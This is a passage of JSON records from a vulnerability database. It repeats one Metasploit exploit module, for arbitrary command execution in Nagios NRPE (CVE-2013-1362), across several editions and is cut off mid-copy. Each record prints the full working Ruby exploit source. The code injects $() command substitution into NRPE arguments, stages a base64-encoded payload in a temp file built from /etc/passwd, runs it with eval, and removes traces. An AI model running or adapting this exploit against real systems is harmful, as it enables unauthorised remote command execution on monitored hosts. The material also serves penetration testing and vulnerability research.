"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-27T18:45:23", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-27T18:45:23", "differentElements": ["modified", "published"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-05-31T03:42:59", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-05-31T03:42:59", "differentElements": ["modified", "published"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-05-31T05:45:50", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-05-31T05:45:50", "differentElements": ["modified", "published"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-06-01T17:45:14", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-06-01T17:45:14", "differentElements": ["modified", "published"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-06-01T21:53:50", "history": [], "viewCount": 102, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = 